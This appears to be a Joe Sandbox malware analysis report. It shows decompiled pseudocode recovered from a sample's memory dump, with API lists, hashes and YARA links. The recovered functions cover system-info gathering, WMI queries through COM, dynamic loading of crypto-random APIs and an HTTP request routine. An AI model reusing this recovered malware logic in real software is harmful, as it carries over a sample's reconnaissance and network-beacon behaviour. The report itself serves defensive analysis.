			E041BB883(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}

0x041bb88b
0x041bb896
0x041bb8a1
0x041bb88d
0x041bb88f
0x041bb891
0x041bb891

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,041BBD6E,?,?,00000000), ref: 041BB896

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: a1d616a6dee9618e31e61a9391f0ee370ecf211b48b01b0d86f7bb61cff7faaa
Instruction ID: 0649f2262d2027e7d1963857e417c85e574f608a5750c9ef9b682617c6c08da0
Opcode Fuzzy Hash: a1d616a6dee9618e31e61a9391f0ee370ecf211b48b01b0d86f7bb61cff7faaa
Instruction Fuzzy Hash: 40C0223160020D06CF009BA2B6066EA32E84B04248F1000A0E982F0480E654ED8042A0

Uniqueness

Uniqueness Score: -1.00%

Function 041BD6E7 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E041BD6E7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E041BD213(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E041B911F(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E041B913B( &_v60, 0xfffffffe);
					E041BD2C7( &_v104);
					return _t320;
				}
				_t165 = E041B90EA(_t255, 0x101c);
				 *_t328 = 0xa18;
				_v52 = _t165;
				_t166 = E041B90EA(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E041B9924(_t165);
				_v60 = _t322;
				E041B9D66( &_v52);
				E041B9D66( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E041B90EA(_t255, 0x10b4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E041B9D66( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E041B913B( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E041B9787(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E041B9787(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E041B91B9(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E041B911F( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E041B913B(_t136, 0);
								E041B913B( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E041B9787(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E041B90EA(_t281, 0xe23);
								 *_t329 = 0x375;
								_t217 = E041B90EA(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E041B911F(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E041B9D66( &_v92);
											E041B9D66( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E041BC08E();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E041B911F(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E041B90EA(_t283, 0xedb);
										E041BC08E( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E041B9D66( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E041B9787(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E041BD5CB( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E041B913B( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x041bd6f0
0x041bd6f6
0x041bd6fd
0x041bd700
0x041bd703
0x041bd708
0x041bd70a
0x041bd70f
0x041bdb57
0x041bdb57
0x041bd71c
0x041bd71e
0x041bd721
0x041bd724
0x041bdb3c
0x041bdb42
0x041bdb4c
0x00000000
0x041bdb51
0x041bd72f
0x041bd736
0x041bd73d
0x041bd740
0x041bd745
0x041bd747
0x041bd74a
0x041bd74d
0x041bd74e
0x041bd757
0x041bd75d
0x041bd760
0x041bd769
0x041bd76e
0x041bd773
0x041bd78a
0x041bd797
0x041bd79a
0x041bd7a1
0x041bd7a6
0x041bd7ad
0x041bd7b2
0x041bd7b9
0x041bd7bb
0x041bd7c7
0x041bd7ca
0x041bd7cc
0x041bdb2c
0x041bdb2d
0x041bdb36
0x00000000
0x041bdb36
0x041bd7d2
0x041bd7d5
0x041bd7d8
0x041bd7db
0x041bd7dd
0x041bdaf8
0x041bdafb
0x041bdafe
0x041bdb00
0x041bdb22
0x041bdb27
0x041bdb02
0x041bdb05
0x041bdb10
0x041bdb17
0x041bdb17
0x00000000
0x00000000
0x00000000
0x00000000
0x041bd7e3
0x041bd7e3
0x041bd7f5
0x041bd7f8
0x041bd7fa
0x00000000
0x00000000
0x041bd802
0x041bd805
0x041bd808
0x041bd80b
0x041bd80e
0x041bd811
0x00000000
0x00000000
0x041bd817
0x041bd825
0x041bd828
0x041bd82a
0x041bd843
0x041bd852
0x041bd85a
0x041bd85a
0x041bd85d
0x041bd864
0x041bd868
0x041bd86e
0x041bd870
0x041bdae0
0x041bdae6
0x041bdaec
0x041bdaef
0x041bdaef
0x00000000
0x041bdaef
0x041bd87f
0x041bd893
0x041bd897
0x041bd899
0x041bd89e
0x041bdaad
0x041bdab3
0x041bdabe
0x041bdac9
0x041bdacf
0x041bdad5
0x041bdad8
0x00000000
0x041bdad8
0x041bd8a4
0x041bda7b
0x041bda7b
0x041bda7e
0x041bda81
0x00000000
0x00000000
0x041bd8ac
0x041bd8b4
0x041bd8bb
0x041bd8c1
0x041bd8c3
0x00000000
0x00000000
0x041bd8cc
0x041bd8e1
0x041bd8e7
0x041bd8f0
0x041bd8f3
0x041bd8f6
0x041bd8f8
0x041bda6e
0x041bda71
0x041bda7a
0x041bda7a
0x00000000
0x041bda7a
0x041bd908
0x041bd90b
0x041bd912
0x041bd918
0x041bd91b
0x041bd91e
0x041bd921
0x041bd924
0x041bd960
0x041bd960
0x041bd963
0x041bda0f
0x041bda23
0x041bda33
0x041bda37
0x041bda39
0x041bda50
0x041bda54
0x041bda5d
0x041bda68
0x00000000
0x041bda68
0x041bda3f
0x041bda40
0x041bda45
0x041bda45
0x041bda47
0x041bda48
0x041bda4d
0x00000000
0x041bda4d
0x041bd969
0x041bd969
0x041bd96c
0x041bd9d7
0x041bd9eb
0x041bd9fb
0x041bd9ff
0x041bda01
0x00000000
0x00000000
0x041bda07
0x041bda08
0x00000000
0x041bda08
0x041bd96e
0x041bd96e
0x041bd971
0x00000000
0x00000000
0x041bd973
0x041bd976
0x00000000
0x00000000
0x041bd978
0x041bd978
0x041bd97e
0x041bd99a
0x041bd9a9
0x041bd9b2
0x041bd9b7
0x041bd9ba
0x041bd9c0
0x041bd9c0
0x041bd9c5
0x041bd9d1
0x00000000
0x041bd9d1
0x041bd983
0x00000000
0x041bd983
0x041bd926
0x041bd94d
0x041bd952
0x041bd957
0x041bd959
0x041bd959
0x00000000
0x041bd957
0x041bd928
0x041bd928
0x041bd92b
0x00000000
0x00000000
0x041bd931
0x041bd931
0x041bd934
0x00000000
0x00000000
0x041bd93a
0x041bd93a
0x041bd93d
0x00000000
0x00000000
0x041bd943
0x041bd946
0x00000000
0x00000000
0x041bd948
0x00000000
0x041bd948
0x041bda8a
0x041bda90
0x041bda96
0x041bda99
0x041bda9c
0x041bda9c
0x041bda9f
0x041bdaa0
0x041bdaa3
0x041bdaa5
0x00000000
0x00000000
0x041bdaf5
0x041bdaf5
0x00000000
0x041bdaf5
0x041bd82c
0x041bd832
0x00000000
0x041bd832
0x041bdaf2
0x00000000
0x041bd775
0x041bd77a
0x041bd77f
0x00000000
0x041bd783

APIs

Part of subcall function 041BD213: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD226
Part of subcall function 041BD213: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD237
Part of subcall function 041BD213: CoCreateInstance.OLE32(041CD848,00000000,00000001,041CD858,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD24E
Part of subcall function 041BD213: SysAllocString.OLEAUT32(00000000), ref: 041BD259
Part of subcall function 041BD213: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD284

SysAllocString.OLEAUT32(00000000), ref: 041BD790
SysAllocString.OLEAUT32(00000000), ref: 041BD7A4
SysFreeString.OLEAUT32(?), ref: 041BDB2D
SysFreeString.OLEAUT32(?), ref: 041BDB36

Part of subcall function 041B913B: HeapFree.KERNEL32(00000000,00000000), ref: 041B9181

Strings

TRUE, xrefs: 041BD952
FALSE, xrefs: 041BD959

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 318989454-1412513891
Opcode ID: dabdf13d4a54229ca20cdabf5ba8a3649b8a144c6b2078743851953de98bca5f
Instruction ID: a4219c36d1c7e13b9b5a105cd120524ea16933667623fe32fcbbfac0ea0871f7
Opcode Fuzzy Hash: dabdf13d4a54229ca20cdabf5ba8a3649b8a144c6b2078743851953de98bca5f
Instruction Fuzzy Hash: 4EE14CB5E00219AFDB18DFA4D8D4EEEBBB9FF49314F104059E645A7280DB35B942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 041C3175 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E041C3175(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E041C30D0( &_v16);
				return 0;
			}

0x041c317b
0x041c318d
0x041c3191
0x041c3205
0x00000000
0x041c3207
0x041c31a1
0x041c31a5
0x00000000
0x00000000
0x041c31ad
0x041c31af
0x041c31b4
0x00000000
0x00000000
0x041c31be
0x041c31c2
0x00000000
0x00000000
0x041c31c4
0x041c31c9
0x041c31cb
0x041c31cd
0x041c31d2
0x041c31d7
0x00000000
0x00000000
0x041c31e2
0x041c31ec
0x041c31f0
0x00000000
0x00000000
0x041c31ff
0x00000000

APIs

GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,041B818C,00000000), ref: 041C3187
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 041C319F
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 041C31AD
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 041C31BC

Strings

advapi32.dll, xrefs: 041C3182
CryptReleaseContext, xrefs: 041C31B6
CryptAcquireContextA, xrefs: 041C3199
CryptGenRandom, xrefs: 041C31A7

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: da93ad685e7852cea38836994338addeffc457759e0a7e0fa597942e77b59170
Instruction ID: 49b85df1777bd0507b245e743b0aba28499f70d7da43c3ea25fca9cf7b7e3791
Opcode Fuzzy Hash: da93ad685e7852cea38836994338addeffc457759e0a7e0fa597942e77b59170
Instruction Fuzzy Hash: 1B11E932A4031D77DF1296F58C85F9EFBAD9F64790F224168ED10E2140EB70EA048A54

Uniqueness

Uniqueness Score: -1.00%

Function 041BF03B Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E041BF03B(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				char _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t91;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t106;
				signed int _t107;
				void* _t108;
				intOrPtr _t109;
				signed int _t110;
				intOrPtr _t112;
				char _t114;
				intOrPtr _t119;
				intOrPtr _t126;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				char _t142;
				intOrPtr _t144;
				void* _t154;
				signed int _t156;
				intOrPtr _t162;
				intOrPtr _t167;
				signed int _t168;
				signed int _t176;
				char _t182;
				signed int _t183;
				void* _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				char _t189;
				void* _t190;
				void* _t191;
				intOrPtr* _t193;

				_t157 = __ecx;
				_v40 = _v40 & 0x00000000;
				_t184 = __edx;
				_v24 = __ecx;
				_v32 = 4;
				_v36 = 1;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_t193 = _t191 + 0x18;
				_v64 = E041B90CA(_t157, 0x503);
				 *_t193 = 0x14ee;
				_v60 = E041B90CA(_t157);
				 *_t193 = 0x18a;
				_v56 = E041B90CA(_t157);
				 *_t193 = 0x128f;
				_v52 = E041B90CA(_t157);
				 *_t193 = 0xe8b;
				_t91 = E041B90CA(_t157);
				_v44 = _v44 & 0;
				_t182 = 0x3c;
				_v48 = _t91;
				E041B92A2( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t182;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E041BCE25(_t184));
				_t99 =  *0x41d0fb8; // 0x0
				_push(_t184);
				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
					_t176 = 0;
					__eflags = 0;
					_v28 = 0;
					do {
						_t101 =  *0x41d0fb8; // 0x0
						_v12 = 0x8404f700;
						_t183 =  *_t101( *0x41d10c8,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
						__eflags = _t183;
						if(_t183 != 0) {
							E041BEFD3(_t183);
							_t106 =  *0x41d0fb8; // 0x0
							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t156 = _t107;
							if(_a24 != 0) {
								E041BC2D1(_a24);
							}
							__eflags = _t156;
							if(_t156 != 0) {
								__eflags = _v112 - 4;
								_t162 = 0x8484f700;
								if(_v112 != 4) {
									_t162 = _v12;
								}
								__eflags = _v24 - 2;
								_t108 = 0x41cdf0c;
								if(_v24 != 2) {
									_t108 = 0x41cdf14;
								}
								_t164 =  &_v652;
								_t109 =  *0x41d0fb8; // 0x0
								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
								__eflags = _a24;
								_t186 = _t110;
								_v8 = _t186;
								if(_a24 != 0) {
									_t164 = _a24;
									E041BC2D1(_a24);
								}
								__eflags = _t186;
								if(_t186 != 0) {
									__eflags = _v112 - 4;
									if(_v112 == 4) {
										_t164 = _t186;
										E041BEF81(_t186);
									}
									__eflags = _v24 - 2;
									if(_v24 != 2) {
										__eflags = 0;
										_t112 =  *0x41d0fb8; // 0x0
										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
									} else {
										_t142 = E041B90CA(_t164, 0xfb3);
										_t189 = _t142;
										_v16 = _t189;
										_t144 =  *0x41d0fb8; // 0x0
										_t186 = _v8;
										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E041BCE25(_t189), _a4, _a8);
										E041B9D4C( &_v16);
									}
									__eflags = _a24;
									if(_a24 != 0) {
										E041BC2D1(_a24);
									}
									__eflags = _v12;
									if(_v12 != 0) {
										L31:
										_t114 = 8;
										_v32 = _t114;
										_v20 = 0;
										_v16 = 0;
										E041B92A2( &_v20, 0, _t114);
										_t119 =  *0x41d0fb8; // 0x0
										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
										if(__eflags != 0) {
											_t187 = E041BC1E4( &_v20, __eflags);
											__eflags = _t187 - 0xc8;
											if(_t187 == 0xc8) {
												 *_a20 = _v8;
												 *_a12 = _t183;
												 *_a16 = _t156;
												__eflags = 0;
												return 0;
											}
											_t188 =  ~_t187;
											L35:
											_t126 =  *0x41d0fb8; // 0x0
											 *((intOrPtr*)(_t126 + 8))(_v8);
											L36:
											__eflags = _t156;
											if(_t156 != 0) {
												_t130 =  *0x41d0fb8; // 0x0
												 *((intOrPtr*)(_t130 + 8))(_t156);
											}
											__eflags = _t183;
											if(_t183 != 0) {
												_t167 =  *0x41d0fb8; // 0x0
												 *((intOrPtr*)(_t167 + 8))(_t183);
											}
											return _t188;
										}
										GetLastError();
										_t188 = 0xfffffff8;
										goto L35;
									} else {
										GetLastError();
										_t134 =  *0x41d0fb8; // 0x0
										 *((intOrPtr*)(_t134 + 8))(_t186);
										_t186 = 0;
										__eflags = 0;
										goto L26;
									}
								} else {
									GetLastError();
									L26:
									_t136 =  *0x41d0fb8; // 0x0
									 *((intOrPtr*)(_t136 + 8))(_t156);
									_t156 = 0;
									__eflags = 0;
									goto L27;
								}
							} else {
								GetLastError();
								L27:
								_t138 =  *0x41d0fb8; // 0x0
								 *((intOrPtr*)(_t138 + 8))(_t183);
								_t183 = 0;
								__eflags = 0;
								goto L28;
							}
						}
						GetLastError();
						L28:
						_t168 = _t186;
						_t176 = _v28 + 1;
						_v28 = _t176;
						__eflags = _t176 - 2;
					} while (_t176 < 2);
					_v8 = _t186;
					__eflags = _t168;
					if(_t168 != 0) {
						goto L31;
					}
					_t188 = 0xfffffffe;
					goto L36;
				}
				_t154 = 0xfffffffc;
				return _t154;
			}

0x041bf03b
0x041bf044
0x041bf051
0x041bf053
0x041bf05b
0x041bf064
0x041bf070
0x041bf081
0x041bf086
0x041bf093
0x041bf096
0x041bf0a2
0x041bf0a5
0x041bf0b1
0x041bf0b4
0x041bf0c0
0x041bf0c3
0x041bf0ca
0x041bf0cf
0x041bf0d5
0x041bf0d7
0x041bf0df
0x041bf0ea
0x041bf0f1
0x041bf0fd
0x041bf100
0x041bf10e
0x041bf111
0x041bf117
0x041bf118
0x041bf11a
0x041bf123
0x041bf124
0x041bf129
0x041bf12f
0x041bf139
0x041bf139
0x041bf13b
0x041bf140
0x041bf140
0x041bf14f
0x041bf15e
0x041bf160
0x041bf162
0x041bf171
0x041bf188
0x041bf18e
0x041bf191
0x041bf195
0x041bf197
0x041bf19c
0x041bf19c
0x041bf1a1
0x041bf1a3
0x041bf1b0
0x041bf1b4
0x041bf1b9
0x041bf1bb
0x041bf1bb
0x041bf1be
0x041bf1c2
0x041bf1c7
0x041bf1c9
0x041bf1c9
0x041bf1d8
0x041bf1e0
0x041bf1e6
0x041bf1e9
0x041bf1ed
0x041bf1ef
0x041bf1f2
0x041bf1f4
0x041bf1f7
0x041bf1f7
0x041bf1fc
0x041bf1fe
0x041bf20b
0x041bf20f
0x041bf211
0x041bf213
0x041bf213
0x041bf218
0x041bf21c
0x041bf258
0x041bf25e
0x041bf267
0x041bf21e
0x041bf223
0x041bf22c
0x041bf231
0x041bf23c
0x041bf242
0x041bf249
0x041bf250
0x041bf255
0x041bf26a
0x041bf26e
0x041bf273
0x041bf273
0x041bf278
0x041bf27c
0x041bf2c5
0x041bf2c7
0x041bf2ca
0x041bf2d2
0x041bf2d6
0x041bf2d9
0x041bf2eb
0x041bf2f6
0x041bf2f8
0x041bf30d
0x041bf30f
0x041bf315
0x041bf34a
0x041bf34f
0x041bf354
0x041bf356
0x00000000
0x041bf356
0x041bf317
0x041bf319
0x041bf319
0x041bf322
0x041bf325
0x041bf325
0x041bf327
0x041bf329
0x041bf32f
0x041bf32f
0x041bf332
0x041bf334
0x041bf336
0x041bf33d
0x041bf33d
0x00000000
0x041bf340
0x041bf2fa
0x041bf302
0x00000000
0x041bf27e
0x041bf27e
0x041bf284
0x041bf28a
0x041bf28d
0x041bf28d
0x00000000
0x041bf28d
0x041bf200
0x041bf200
0x041bf28f
0x041bf28f
0x041bf295
0x041bf298
0x041bf298
0x00000000
0x041bf298
0x041bf1a5
0x041bf1a5
0x041bf29a
0x041bf29a
0x041bf2a0
0x041bf2a3
0x041bf2a3
0x00000000
0x041bf2a3
0x041bf1a3
0x041bf164
